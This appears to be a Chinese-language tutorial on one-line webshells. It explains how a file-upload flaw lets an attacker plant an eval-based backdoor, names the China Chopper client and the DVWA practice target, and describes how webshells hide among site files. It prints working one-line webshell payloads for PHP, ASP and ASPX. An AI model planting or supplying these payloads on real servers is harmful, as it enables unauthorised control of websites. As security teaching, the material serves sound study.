合规国际互联网加速 OSASE为企业客户提供高速稳定SD-WAN国际加速解决方案。 广告
[TOC] ## 基本原理 ``` 举例:<?php @eval($_POST['attack']);?> ``` 利用文件上传漏洞,往目标网站中上传一句话木马,然后可以在本地通过中国菜刀chopper.exe获取和控制整个网站目录。@表示后面即使执行错误,也不报错。`eval()`函数表示括号内的语句字符串什么的全都当做代码执行。`$_POST['attack']`表示从页面中获得attack这个参数值。 ## 入侵条件 (1)木马上传成功,未被杀(木马免杀); (2)知道木马在网站存储的路径在哪; (3)上传的木马能正常运行。 ## 常见形式 ``` php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%> ``` ## 工具 DVWA是一款渗透测试的演练系统,入门找不到合适的靶机,推荐用DVWA。 ## WebShell Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。 webshell根据功能也分为大马、小马和一句话木马,例如:<%eval request(“pass”)%>通常把这句话写入一个文档里面,然后文件名改成xx.asp。然后传到服务器上面。用eval方法将request(“pass”)转换成代码执行,request函数的作用是应用外部文件。这相当于一句话木马的客户端配置。